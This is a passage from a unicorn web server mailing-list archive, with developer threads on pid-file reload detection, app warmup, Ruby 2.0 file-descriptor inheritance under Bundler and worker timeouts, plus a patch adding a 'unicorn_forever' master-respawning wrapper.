> means the reload must have been successful.   What race condition are
> you referring to that would render this conclusion inaccurate?

It doesn't mean the process didn't exit/crash right after writing the PID.

> > Having the process start time in /proc be unreliable because the server
> > has the wrong time is also in the same category of corner cases.
> 
> This is absolutely not true.  A significant minority, if not a
> majority, of servers will have at least slightly inaccurate wall
> clocks on boot.  This is usually corrected during boot by an NTP sync,
> but by then the die has already been cast insofar as ps(1) output is
> concerned.

But NTP syncs early in the boot process before most processes (including
unicorn) are started.  It shouldn't matter, then, right?

> > Also, can you check the inode of the /proc/$pid entry?  Perhaps
> 
> That's not portable.
> 
> > PID files are horrible, really :<
> 
> To reiterate, I'm not using the PID file in this instance to determine
> Unicorn's PID.  It could be empty, for all I care.

OK.  I assume you do the same for nginx?

^ permalink raw reply	[relevance 3%]

* Re: pid file handling issue
  2013-10-24  2:03  3%     ` Eric Wong
@ 2013-10-24 17:51  0%       ` Michael Fischer
  2013-10-24 18:21  3%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-24 17:51 UTC (permalink / raw)
  To: unicorn list

On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:

>> > I read and stash the value of the pid file before issuing any USR2.
>> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
>> > to ensure it's dead.
>>
>> That's inherently racy; another process can claim the old PID in the interim.
>
> Right, but raciness goes for anything regarding pid files.
>
> The OS does make an effort to avoid recycling PIDs too often,
> and going through all the PIDs in a system quickly is
> probably rare.  I haven't hit it, at least.

That's not good enough.

The fact that the pid file contains a pid is immaterial to me; I don't
even need to look at it.  I only care about when it was created, or
what its inode number is, so that I can detect whether Unicorn was
last successfully started or restarted.  rename(2) is atomic per POSIX
and is not subject to race conditions.

>> > Checking the mtime of the pidfile is really bizarre...
>>
>> Perhaps (though it's a normative criticism), but on the other hand, it
>> isn't subject to the race above.
>
> It's still racy in a different way, though (file could change right
> after checking).

If the file's mtime or inode number changes under my proposal, that
means the reload must have been successful.   What race condition are
you referring to that would render this conclusion inaccurate?
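
(In Ruby terms, a minimal sketch of that check, with the pid file path
as a placeholder:

  before = File.stat("unicorn.pid").ino
  # ... send SIGUSR2 and wait for the handoff to finish ...
  reloaded = File.stat("unicorn.pid").ino != before

an mtime comparison works the same way.)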

> Having the process start time in /proc be unreliable because the server
> has the wrong time is also in the same category of corner cases.

This is absolutely not true.  A significant minority, if not a
majority, of servers will have at least slightly inaccurate wall
clocks on boot.  This is usually corrected during boot by an NTP sync,
but by then the die has already been cast insofar as ps(1) output is
concerned.

> Also, can you check the inode of the /proc/$pid entry?  Perhaps

That's not portable.

> PID files are horrible, really :<

To reiterate, I'm not using the PID file in this instance to determine
Unicorn's PID.  It could be empty, for all I care.

--Michael

^ permalink raw reply	[relevance 0%]

* Re: pid file handling issue
  @ 2013-10-24  2:03  3%     ` Eric Wong
  2013-10-24 17:51  0%       ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24  2:03 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> > I read and stash the value of the pid file before issuing any USR2.
> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> > to ensure it's dead.
> 
> That's inherently racy; another process can claim the old PID in the interim.

Right, but raciness goes for anything regarding pid files.

The OS does make an effort to avoid recycling PIDs too often,
and going through all the PIDs in a system quickly is
probably rare.  I haven't hit it, at least.
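
(The stash-and-check flow quoted above, sketched in Ruby as a
hypothetical wrapper script rather than anything inside unicorn
itself; pid_file is a placeholder for the configured pid path:

  old_pid = File.read(pid_file).to_i
  Process.kill(:USR2, old_pid)   # re-exec a new master
  # ... wait until the new master is up and serving ...
  Process.kill(:QUIT, old_pid)   # gracefully stop the old master
  begin
    sleep 0.1 while Process.kill(0, old_pid) # signal 0 only checks existence
  rescue Errno::ESRCH
    # old master is gone
  end

which is exactly the part that is subject to the PID-reuse race
discussed here.)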

> > Checking the mtime of the pidfile is really bizarre...
> 
> Perhaps (though it's a normative criticism), but on the other hand, it
> isn't subject to the race above.

It's still racy in a different way, though (file could change right
after checking).

> > OTOH, there's times when users accidentally remove a pid
> > file and regenerate by hand it from ps(1), too...
> 
> Sure, but (a) that's a corner case I'm not particularly concerned
> about, and (b) it wouldn't cause any problems, assuming the user did
> this before any reload attempt, and not in the middle or something.

Having the process start time in /proc be unreliable because the server
has the wrong time is also in the same category of corner cases.

Also, can you check the inode of the /proc/$pid entry?  Perhaps

PID files are horrible, really :<

^ permalink raw reply	[relevance 3%]

* Re: IOError: closed stream
  @ 2013-09-26 22:31  2% ` David Judd
  0 siblings, 0 replies; 200+ results
From: David Judd @ 2013-09-26 22:31 UTC (permalink / raw)
  To: mongrel-unicorn

>
> Do you have anything in your Rack app which does background processing
> of rack.input after the response is written?
> That would be the most likely explanation...

Not that I'm aware of, and I can't find any references to rack.input
in our codebase aside from the monkeypatch.

> If varnish is used, your nginx -> varnish -> unicorn is what I would
> recommend (not that I have much experience with varnish, but I when I
> last looked at them, nginx was better at handling slow/idle
> connections).
> That said, I'm not sure what could cause the increase in errors...
> Is varnish attempting to pre-connect?

I realized when I was seeing the errors en masse, I was actually just
running varnish->unicorn, no nginx--I hadn't finished the switch to
nginx->varnish->unicorn which we had planned.

> Can you reproduce this error on a minimal Rack app from a client
> you control?

I'll give it a shot when I have some time, but suspect it will be
tough. Even with the 'bad' setup, it's an infrequent error with
production traffic that's pretty high-volume.

I'll also (actually, probably sooner) actually try the configuration
of nginx->varnish->unicorn. If that works, or mostly works, I may not
be able to justify investing the time to dig into this further.

> For the minimal rack test app, try just an unpatched Rack,
> there could be a subtle compatibility problems from the monkey patch.
> The basic idea is to eliminate variables and strange/uncommon things to
> pinpoint the problem.

With an unpatched Rack, I get a NoMethodError due to
Rack::Request#POST returning nil. I think there's a one-to-one
correspondence between when one error would occur and when the other
would, but I can't confirm that - one started appearing as soon as the
other disappeared, at roughly the same rate. The seemingly relevant
commit (although the justification for the change doesn't seem
related): https://github.com/rack/rack/commit/b0593078ce792a380779528a6a135c066aa03515

Thanks,
David

On Tue, Sep 24, 2013 at 9:02 AM, David Judd <david@academia.edu> wrote:
> I'm getting "IOError: closed stream" from inside Unicorn occasionally
> and I don't know what to make of it. The stack trace looks like this:
>
> unicorn (4.5.0) lib/unicorn/stream_input.rb:129:in `kgio_read' unicorn
> (4.5.0) lib/unicorn/stream_input.rb:129:in `read_all' unicorn (4.5.0)
> lib/unicorn/stream_input.rb:60:in `read' unicorn (4.5.0)
> lib/unicorn/tee_input.rb:84:in `read'
> config/initializers/rack_request.rb:19:in `POST' rack (1.4.5)
> lib/rack/request.rb:221:in `params'
>
> Any suggestions what this might indicate? Is this what I should
> legitimately expect to see if the browser closes the connection
> abruptly?
>
> It's happening only for POSTs, and a small percentage of them, but I
> can't find any further pattern - a variety of content, usually quite
> small content-lengths.
>
> Currently we're running nginx in front of unicorn via a unix socket.
> In this state the errors occur at an almost-negligible rate. I
> experimented yesterday with moving instead to nginx in front of
> varnish, on a separate machine, with varnish then talking to unicorn
> via a TCP socket. In that configuration the errors increased
> dramatically, although the majority of requests still succeeded.
>
> As you can see we're running unicorn 4.5 and rack 1.4.5 - except that
> I'm monkey-patching Rack::Request to backport the 1.5 POST method,
> which transforms an earlier nil error in to this one. (On Ruby 2.0.0,
> on an Ubuntu-precise box on AWS.)
>
> Any relevant info or suggestions would be appreciated.
>
> Apologies if this shows up as a double-post--my first attempt seems to
> have been rejected because I didn't turn on plain text mode.
>
> Thanks,
> David

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] preload_app can take an optional block for warmup
  2013-09-21 23:10  0%   ` Aman Gupta
@ 2013-09-23 10:58  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-23 10:58 UTC (permalink / raw)
  To: Aman Gupta; +Cc: unicorn list

Aman Gupta <aman@tmm1.net> wrote:
> > In particular, what benefit does this have over putting the same
> > code in config.ru or config/initializer.rb (or similar?)
> 
> With my patch, preload_app yields a rack app object which includes the
> middleware stack. AFAIK there's no way to do this in the context of
> config.ru, since the app is still being built. My goal is to warm up
> the final application that will be serving traffic, including all
> middleware.

Good point.  Perhaps this can be triggered via Rack::Builder#to_app
instead, so it can benefit _all_ Rack HTTP servers.

Care to move this discussion over to rack-devel?

There's the odd non-Rack::Builder case, too, but I think everybody just
uses Rack::Builder via config.ru, right?
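
(One hypothetical shape of that idea -- a monkey-patch here only to
show the hook point, not an agreed-upon Rack API:

  require 'rack/builder'

  class Rack::Builder
    def warmup(&blk)   # hypothetical config.ru-level DSL
      @warmup = blk
    end

    alias to_app_without_warmup to_app
    def to_app
      app = to_app_without_warmup
      @warmup.call(app) if @warmup
      app
    end
  end

any server that builds its app via Rack::Builder#to_app would then run
the warmup block, not just unicorn.)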

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] preload_app can take an optional block for warmup
  2013-09-21  8:49  3% ` Eric Wong
@ 2013-09-21 23:10  0%   ` Aman Gupta
  2013-09-23 10:58  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Aman Gupta @ 2013-09-21 23:10 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

> In particular, what benefit does this have over putting the same
> code in config.ru or config/initializer.rb (or similar?)

With my patch, preload_app yields a rack app object which includes the
middleware stack. AFAIK there's no way to do this in the context of
config.ru, since the app is still being built. My goal is to warm up
the final application that will be serving traffic, including all
middleware.
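
(A rough usage sketch; the block form is what this patch proposes, and
the exact configurator syntax isn't visible in the quoted hunk:

  require 'rack/mock'
  preload_app true do |app|
    app.call(Rack::MockRequest.env_for("/")) # exercise the full middleware stack
  end

so the object being warmed up is the same one the workers will serve.)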

On Sat, Sep 21, 2013 at 1:49 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Aman Gupta <aman@tmm1.net> wrote:
>
> Thanks for the patch!
>
> I expect a commit message body to describe why it is useful.
>
> In particular, what benefit does this have over putting the same
> code in config.ru or config/initializer.rb (or similar?)
>
> For user-visible config changes like these, it can be similar/identical
> to the added documentation.
>
> Anyways, I agree warming up the app is often necessary, but I'm not
> convinced it's necessary to change unicorn for it.  It makes sense
> to warmup apps on servers other than unicorn, too.
>
>> --- a/lib/unicorn/http_server.rb
>> +++ b/lib/unicorn/http_server.rb
>> @@ -721,6 +721,9 @@ class Unicorn::HttpServer
>>          Gem.refresh
>>        end
>>        self.app = app.call
>> +      if preload_app.respond_to?(:call)
>> +        preload_app[app]
>> +      end
>
> Since you're testing for respond_to?(:call), it should be less confusing
> to use "preload_app.call(app)" here instead of "preload_app[app]"

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] preload_app can take an optional block for warmup
  @ 2013-09-21  8:49  3% ` Eric Wong
  2013-09-21 23:10  0%   ` Aman Gupta
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-09-21  8:49 UTC (permalink / raw)
  To: unicorn list; +Cc: Aman Gupta

Aman Gupta <aman@tmm1.net> wrote:

Thanks for the patch!

I expect a commit message body to describe why it is useful.

In particular, what benefit does this have over putting the same
code in config.ru or config/initializer.rb (or similar?)

For user-visible config changes like these, it can be similar/identical
to the added documentation.

Anyways, I agree warming up the app is often necessary, but I'm not
convinced it's necessary to change unicorn for it.  It makes sense
to warmup apps on servers other than unicorn, too.

> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -721,6 +721,9 @@ class Unicorn::HttpServer
>          Gem.refresh
>        end
>        self.app = app.call
> +      if preload_app.respond_to?(:call)
> +        preload_app[app]
> +      end

Since you're testing for respond_to?(:call), it should be less confusing
to use "preload_app.call(app)" here instead of "preload_app[app]"

^ permalink raw reply	[relevance 3%]

* Re: Ruby 2.0 Bad file descriptor (Errno::EBADF)
  2013-09-04 19:00  3%       ` Eric Chapweske
@ 2013-09-04 19:29  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-04 19:29 UTC (permalink / raw)
  To: unicorn list

Eric Chapweske <eac@zendesk.com> wrote:
> We ran into the same issue. For us, it was because we were executing the 
> process using bundle exec.  Bundler doesn't preserve the 1.9 behavior around
> FD inheritance. https://github.com/bundler/bundler/issues/2628

Thanks Eric!  I just pushed out the following and updated the website.

Subject: [PATCH] Sandbox: document SIGUSR2 + bundler issue with 2.0.0

Thanks to Eric Chapweske for the heads up.

ref: http://mid.gmane.org/loom.20130904T205308-432@post.gmane.org
---
 Sandbox | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Sandbox b/Sandbox
index 1df149b..3c7f226 100644
--- a/Sandbox
+++ b/Sandbox
@@ -60,6 +60,13 @@ If you're using an older Bundler version (0.9.x), you may need to set or
 reset GEM_HOME, GEM_PATH and PATH environment variables in the
 before_exec hook as illustrated by http://gist.github.com/534668
 
+=== Ruby 2.0.0 close-on-exec and SIGUSR2 incompatibility
+
+Ruby 2.0.0 enforces FD_CLOEXEC on file descriptors by default.  unicorn
+has been prepared for this behavior since unicorn 4.1.0, but we forgot
+to remind the Bundler developers.  This issue is being tracked here:
+https://github.com/bundler/bundler/issues/2628
+
 == Isolate
 
 === Running
-- 
Eric Wong

^ permalink raw reply related	[relevance 0%]

* Re: Ruby 2.0 Bad file descriptor (Errno::EBADF)
  @ 2013-09-04 19:00  3%       ` Eric Chapweske
  2013-09-04 19:29  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Chapweske @ 2013-09-04 19:00 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> writes:

> OK, this is really strange; especially since you're only hitting this
> on your legacy app and not a new one.
> 
> I certainly haven't hit this with Ruby 2.0.0 anywhere (neither unicorn
> nor Rainbows!).  I'm fairly certain enough folks are using Ruby 2.0.0 by
> now that we would have more reports if something were amiss.
> 
> Let us know what you find, thanks!


We ran into the same issue. For us, it was because we were executing the 
process using bundle exec.  Bundler doesn't preserve the 1.9 behavior around
FD inheritance. https://github.com/bundler/bundler/issues/2628
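
(The underlying Ruby change, illustrated outside of unicorn or bundler:

  r, w = IO.pipe
  r.close_on_exec?  # => false on 1.9.x, true by default on 2.0.0

so descriptors that 1.9 quietly passed across exec are closed on 2.0.0
unless something clears the flag first.)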



^ permalink raw reply	[relevance 3%]

* Re: A barrage of unexplained timeouts
  2013-08-20 18:49  0%         ` Eric Wong
@ 2013-08-20 20:03  0%           ` nick
  0 siblings, 0 replies; 200+ results
From: nick @ 2013-08-20 20:03 UTC (permalink / raw)
  To: unicorn list

"Eric Wong" <normalperson@yhbt.net> said:

> nick@auger.net wrote:
>> "Eric Wong" <normalperson@yhbt.net> said:
>> >
>> > Do you have any other requests in your logs which could be taking
>> > a long time and hogging workers, but not high enough to trigger the
>> > unicorn kill timeout.
> 
>> I don't *think* so.  Most requests finish <300ms.  We do have some
>> more intensive code-paths, but they're administrative and called much
>> less frequently.  Most of these pages complete in <3seconds.
>>
>> For requests that made it to rails logging, the LAST processed request
>> before the worker timed-out all completed very quickly (and no real
>> pattern in terms of which page may be triggering it.)
> 
> This is really strange.  This was only really bad for a 7s period?

It was a 7 minute period.  All of the workers would become busy and exceed their >120s timeout.  The master would kill and re-spawn them; they'd start to respond to a handful of requests (anywhere from 5-50), after which they'd become "busy" again and get force-killed by the master.  This pattern happened 3 times over the 7 minute period.

> Has it happened again?

No

> Anything else going on with the system at that time?  Swapping, particularly...

No swap activity or high load.  Our munin graphs indicate a peak of web/app server disk latency around that time, although our graphs show many other similar peaks, without incident.

> And if you're inside a VM, maybe your neighbors were hogging things.
> Large PUT/POST requests which require filesystem I/O are particularly
> sensitive to this.

We can't blame virtualization as we're on dedicated hardware.

>> > Is this with Unix or TCP sockets?  If it's over a LAN, maybe there's
>> > still a bad switch/port/cable somewhere (that happens often to me).
>>
>> TCP sockets, with nginx and unicorn running on the same box.
> 
> OK, that probably rules out a bunch of problems.
> Just to be thorough, anything interesting in dmesg or syslogs?

Nothing interesting in /var/log/messages.  dmesg (no timestamps) includes lines like:

TCP: Treason uncloaked! Peer ###.###.###.###:63554/80 shrinks window 1149440448:1149447132. Repaired.

>> > With Unix sockets, I don't recall encountering recent problems under
>> > Linux.  Which OS are you running?
>>
>> Stock RHEL 5, kernel 2.6.18.
> 
> RHEL 5.0 or 5.x?  I can't remember /that/ far back to 5.0 (I don't think
> I even tried it until 5.2), but don't recall anything being obviously
> broken in those...

We're on RHEL 5.6.

Thanks,

-Nick


^ permalink raw reply	[relevance 0%]

* Re: A barrage of unexplained timeouts
  2013-08-20 18:11  3%       ` nick
@ 2013-08-20 18:49  0%         ` Eric Wong
  2013-08-20 20:03  0%           ` nick
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-08-20 18:49 UTC (permalink / raw)
  To: unicorn list

nick@auger.net wrote:
> "Eric Wong" <normalperson@yhbt.net> said:
> > 
> > Do you have any other requests in your logs which could be taking
> > a long time and hogging workers, but not high enough to trigger the
> > unicorn kill timeout.

> I don't *think* so.  Most requests finish <300ms.  We do have some
> more intensive code-paths, but they're administrative and called much
> less frequently.  Most of these pages complete in <3seconds.
> 
> For requests that made it to rails logging, the LAST processed request
> before the worker timed-out all completed very quickly (and no real
> pattern in terms of which page may be triggering it.)

This is really strange.  This was only really bad for a 7s period?
Has it happened again?  Anything else going on with the system at that
time?  Swapping, particularly...

And if you're inside a VM, maybe your neighbors were hogging things.
Large PUT/POST requests which require filesystem I/O are particularly
sensitive to this.

> > Is this with Unix or TCP sockets?  If it's over a LAN, maybe there's
> > still a bad switch/port/cable somewhere (that happens often to me).
> 
> TCP sockets, with nginx and unicorn running on the same box.

OK, that probably rules out a bunch of problems.
Just to be thorough, anything interesting in dmesg or syslogs?

> > With Unix sockets, I don't recall encountering recent problems under
> > Linux.  Which OS are you running?
> 
> Stock RHEL 5, kernel 2.6.18.

RHEL 5.0 or 5.x?  I can't remember /that/ far back to 5.0 (I don't think
I even tried it until 5.2), but don't recall anything being obviously
broken in those...

^ permalink raw reply	[relevance 0%]

* Re: A barrage of unexplained timeouts
  @ 2013-08-20 18:11  3%       ` nick
  2013-08-20 18:49  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: nick @ 2013-08-20 18:11 UTC (permalink / raw)
  To: unicorn list

"Eric Wong" <normalperson@yhbt.net> said:
> nick@auger.net wrote:
>> "Eric Wong" <normalperson@yhbt.net> said:
>> > Can you take a look at the nginx error and access logs?  From what
>> > you're saying, there's a chance a request never even got to the Rails
>> > layer.  However, nginx should be logging failed/long-running requests to
>> > unicorn.
>>
>> The nginx access logs show frequent 499 responses.  The error logs are filled
>> with:
>>
>> connect() failed (110: Connection timed out) while connecting to upstream
>> upstream timed out (110: Connection timed out) while reading response header from
>> upstream
>>
>> What specific pieces of information should I be looking for in the logs?
> 
> Do you have any other requests in your logs which could be taking
> a long time and hogging workers, but not high enough to trigger the
> unicorn kill timeout.

I don't *think* so.  Most requests finish <300ms.  We do have some more intensive code-paths, but they're administrative and called much less frequently.  Most of these pages complete in <3seconds.

For requests that made it to rails logging, the LAST processed request before the worker timed-out all completed very quickly (and no real pattern in terms of which page may be triggering it.)

> (enable $request_time in nginx access logs if you haven't already)

I'll enable this.

> Is this with Unix or TCP sockets?  If it's over a LAN, maybe there's
> still a bad switch/port/cable somewhere (that happens often to me).

TCP sockets, with nginx and unicorn running on the same box.

> With Unix sockets, I don't recall encountering recent problems under
> Linux.  Which OS are you running?

Stock RHEL 5, kernel 2.6.18.

Thanks again,

-Nick




^ permalink raw reply	[relevance 3%]

* [PATCH] unicorn_forever: new executable to respawn masters
@ 2013-07-24  3:11  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-07-24  3:11 UTC (permalink / raw)
  To: mongrel-unicorn

Comments/reports of success/failure appreciated.

(Bcc-ing the user who contacted me privately about daemontools :)
--------------------------------8<------------------------------
From: Eric Wong <normalperson@yhbt.net>
Subject: [PATCH] unicorn_forever: new executable to respawn masters

Warning: lightly tested (and not under daemontools/systemd/etc)

This may be useful for daemontools and similar init replacements
which behave badly when the master process is replaced during the
normal SIGUSR2 && SIGQUIT routine.

Usage:

  unicorn_forever EXISTING UNICORN COMMAND-LINE

Example:

  unicorn_forever unicorn -c /path/to/unicorn_config.rb config.ru

It can also be used to keep Rainbows! processes alive as long as
you check for "Rainbows!" constant references in your config file.

  unicorn_forever rainbows -c /path/to/rainbows_config.rb config.ru

Supported signals:

SIGKILL - really kill the unicorn_forever process (unblockable)

SIGSTOP - pauses the process; this prevents unicorn_forever from detecting
          or respawning a dead master

SIGTSTP - same as SIGSTOP

SIGCONT - resumes a process stopped by SIGSTOP or SIGTSTP

The signals above apply implicitly to every process; the following
two should be familiar to existing unicorn users.

SIGHUP  - reloads the config (just like regular unicorn).
          This does not touch the existing master process, but allows
	  future masters to be spawned with a different set of listen
	  sockets.

SIGUSR1 - reopens existing log files, this signal is forwarded to the
          regular unicorn master (and thus any workers it has)

All other normal unicorn signals are logged and otherwise ignored.
They are not forwarded to the unicorn master.

To upgrade a unicorn application, just send SIGQUIT (not SIGUSR2) to the
existing master and unicorn_forever will automatically respawn.
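
For example, from a Ruby deploy script (the pid path below is only a
placeholder for whatever the wrapped unicorn config sets):

  Process.kill(:QUIT, File.read("/path/to/unicorn.pid").to_i)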

There is no way to gracefully upgrade unicorn_forever without losing
connections.  Doing graceful upgrades of unicorn_forever would defeat
the purpose and cause parents (e.g. daemontools) to notice a child
death.

unicorn_forever is probably unnecessary for systemd.  The use of cgroups
with systemd prevents daemons from "escaping" the control of systemd, so
a daemonized unicorn probably remains visible to systemd.

Implementation:

unicorn_forever is a stripped-down version of unicorn (and the
Unicorn::HttpServer class) which contains enough to:

* parse the config file for listeners (and general validation)
* bind listen sockets
* issue chdir for the working_directory
* set the UNICORN_FD environment variable
* exec the real process (unicorn/rainbows/whatever...)

It does not load nor validate the application.
---
 bin/unicorn_forever    | 126 +++++++++++++++++++++
 lib/unicorn/forever.rb | 289 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 415 insertions(+)
 create mode 100755 bin/unicorn_forever
 create mode 100644 lib/unicorn/forever.rb

diff --git a/bin/unicorn_forever b/bin/unicorn_forever
new file mode 100755
index 0000000..bef3a5f
--- /dev/null
+++ b/bin/unicorn_forever
@@ -0,0 +1,126 @@
+#!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
+# -*- encoding: binary -*-
+require 'unicorn'
+require 'unicorn/forever'
+require 'optparse'
+
+rackup_opts = Unicorn::Configurator::RACKUP
+options = rackup_opts[:options]
+
+op = OptionParser.new("", 24, '  ') do |opts|
+  cmd = File.basename($0)
+  opts.banner = "Usage: #{cmd} " \
+                "[ruby options] [#{cmd} options] [rackup config file]"
+  opts.separator "Ruby options:"
+
+  lineno = 1
+  opts.on("-e", "--eval LINE", "evaluate a LINE of code") do |line|
+    eval line, TOPLEVEL_BINDING, "-e", lineno
+    lineno += 1
+  end
+
+  opts.on("-d", "--debug", "set debugging flags (set $DEBUG to true)") do
+    $DEBUG = true
+  end
+
+  opts.on("-w", "--warn", "turn warnings on for your script") do
+    $-w = true
+  end
+
+  opts.on("-I", "--include PATH",
+          "specify $LOAD_PATH (may be used more than once)") do |path|
+    $LOAD_PATH.unshift(*path.split(/:/))
+  end
+
+  opts.on("-r", "--require LIBRARY",
+          "require the library, before executing your script") do |library|
+    require library
+  end
+
+  opts.separator "#{cmd} options:"
+
+  # some of these switches exist for rackup command-line compatibility,
+
+  opts.on("-o", "--host HOST",
+          "listen on HOST (default: #{Unicorn::Const::DEFAULT_HOST})") do |h|
+    rackup_opts[:host] = h
+    rackup_opts[:set_listener] = true
+  end
+
+  opts.on("-p", "--port PORT",
+          "use PORT (default: #{Unicorn::Const::DEFAULT_PORT})") do |p|
+    rackup_opts[:port] = p.to_i
+    rackup_opts[:set_listener] = true
+  end
+
+  opts.on("-E", "--env RACK_ENV",
+          "use RACK_ENV for defaults (default: development)") do |e|
+    ENV["RACK_ENV"] = e
+  end
+
+  opts.on("-N", "--no-default-middleware",
+          "do not load middleware implied by RACK_ENV") do |e|
+    rackup_opts[:no_default_middleware] = true
+  end
+
+  opts.on("-D", "--daemonize", "run daemonized in the background") do |d|
+    rackup_opts[:daemonize] = !!d
+  end
+
+  opts.on("-P", "--pid FILE", "DEPRECATED") do |f|
+    warn %q{Use of --pid/-P is strongly discouraged}
+    warn %q{Use the 'pid' directive in the Unicorn config file instead}
+    options[:pid] = f
+  end
+
+  opts.on("-s", "--server SERVER",
+          "this flag only exists for compatibility") do |s|
+    warn "-s/--server only exists for compatibility with rackup"
+  end
+
+  # Unicorn-specific stuff
+  opts.on("-l", "--listen {HOST:PORT|PATH}",
+          "listen on HOST:PORT or PATH",
+          "this may be specified multiple times",
+          "(default: #{Unicorn::Const::DEFAULT_LISTEN})") do |address|
+    options[:listeners] << address
+  end
+
+  opts.on("-c", "--config-file FILE", "Unicorn-specific config file") do |f|
+    options[:config_file] = f
+  end
+
+  # I'm avoiding Unicorn-specific config options on the command-line.
+  # IMNSHO, config options on the command-line are redundant given
+  # config files and make things unnecessarily complicated with multiple
+  # places to look for a config option.
+
+  opts.separator "Common options:"
+
+  opts.on_tail("-h", "--help", "Show this message") do
+    puts opts.to_s.gsub(/^.*DEPRECATED.*$/s, '')
+    exit
+  end
+
+  opts.on_tail("-v", "--version", "Show version") do
+    puts "#{cmd} v#{Unicorn::Const::UNICORN_VERSION}"
+    exit
+  end
+
+  opts.parse! ARGV
+end
+
+# ARGV[0] is usually "unicorn", but "unicorn_rails" or custom
+# BYOE wrappers work, too
+ru = ARGV[1] || 'config.ru'
+Unicorn::Configurator::RACKUP.merge!(:file => ru, :optparse => op)
+op = nil
+
+if $DEBUG
+  require 'pp'
+  pp({
+    :unicorn_options => options,
+    :daemonize => rackup_opts[:daemonize],
+  })
+end
+Unicorn::Forever.new(options).start.join
diff --git a/lib/unicorn/forever.rb b/lib/unicorn/forever.rb
new file mode 100644
index 0000000..3f6c5fe
--- /dev/null
+++ b/lib/unicorn/forever.rb
@@ -0,0 +1,289 @@
+# -*- encoding: binary -*-
+#
+# Normally the unicorn master process can handle all the restarting,
+# however with init replacements becoming process managers, we may want
+# to use something which never dies and restarts the master.
+class Unicorn::Forever
+  # :stopdoc:
+  include Unicorn::SocketHelper
+
+  attr_accessor :listener_opts, :init_listeners, :config, :logger
+
+  START_CTX = {
+    :argv => ARGV.map { |arg| arg.dup },
+  }
+
+  # We favor ENV['PWD'] since it is (usually) symlink aware for Capistrano
+  # and like systems
+  START_CTX[:cwd] = begin
+    a = File.stat(pwd = ENV['PWD'])
+    b = File.stat(Dir.pwd)
+    a.ino == b.ino && a.dev == b.dev ? pwd : Dir.pwd
+  rescue
+    Dir.pwd
+  end
+
+  def initialize(options = {})
+    @listeners = []
+    @self_pipe = []
+    @new_listeners = []
+    @init_listeners = options[:listeners] ? options[:listeners].dup : []
+    options[:use_defaults] = true
+    @config = Unicorn::Configurator.new(options)
+    @listener_opts = {}
+    @config.commit!(self, :skip => [:listeners])
+    @respawn = true
+    @self_pipe = Kgio::Pipe.new
+    @self_pipe.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
+    # signal queue used for self-piping
+    @sig_queue = []
+  end
+
+  def setup_sighandlers
+    %w(CHLD HUP QUIT TERM INT USR1 USR2 TTIN TTOU WINCH).each do |s|
+      trap(s) { sig_handler(s.to_sym) }
+    end
+  end
+
+  # Runs the thing.  Returns self so you can run join on it
+  def start
+    # no inheriting, just start the default if needed
+    config_listeners = @config[:listeners].dup
+    if config_listeners.empty?
+      config_listeners << Unicorn::Const::DEFAULT_LISTEN
+      @init_listeners << Unicorn::Const::DEFAULT_LISTEN
+      START_CTX[:argv] << "-l#{Unicorn::Const::DEFAULT_LISTEN}"
+    end
+    @new_listeners.replace(config_listeners)
+
+    bind_new_listeners!
+    setup_sighandlers
+    do_exec
+    self
+  end
+
+  # replaces current listener set with +listeners+.  This will
+  # close the socket if it will not exist in the new listener set
+  def listeners=(listeners)
+    cur_names, dead_names = [], []
+    listener_names.each do |name|
+      if ?/ == name[0]
+        # mark unlinked sockets as dead so we can rebind them
+        (File.socket?(name) ? cur_names : dead_names) << name
+      else
+        cur_names << name
+      end
+    end
+    set_names = listener_names(listeners)
+    dead_names.concat(cur_names - set_names).uniq!
+
+    @listeners.delete_if do |io|
+      if dead_names.include?(sock_name(io))
+        IO_PURGATORY.delete_if do |pio|
+          pio.fileno == io.fileno && (pio.close rescue nil).nil? # true
+        end
+        (io.close rescue nil).nil? # true
+      else
+        set_server_sockopt(io, listener_opts[sock_name(io)])
+        false
+      end
+    end
+
+    (set_names - cur_names).each { |addr| listen(addr) }
+  end
+
+  def stdout_path=(path); redirect_io($stdout, path); end
+  def stderr_path=(path); redirect_io($stderr, path); end
+
+  # for Configurator compatibility:
+  def noop(arg = nil); end
+  alias client_body_buffer_size= noop
+  alias client_body_buffer_size noop
+  alias check_client_connection= noop
+  alias check_client_connection noop
+  alias pid= noop
+  alias pid noop
+  alias preload_app= noop
+  alias preload_app noop
+  alias timeout= noop
+  alias timeout noop
+  alias trust_x_forwarded= noop
+  alias trust_x_forwarded noop
+  alias rewindable_input= noop
+  alias rewindable_input noop
+  alias worker_processes= noop
+  alias worker_processes noop
+  alias after_fork= noop
+  alias after_fork noop
+  alias before_fork= noop
+  alias before_fork noop
+  alias before_exec= noop
+  alias before_exec noop
+
+  # add a given address to the +listeners+ set, idempotently
+  # Allows workers to add a private, per-process listener via the
+  # after_fork hook.  Very useful for debugging and testing.
+  # +:tries+ may be specified as an option for the number of times
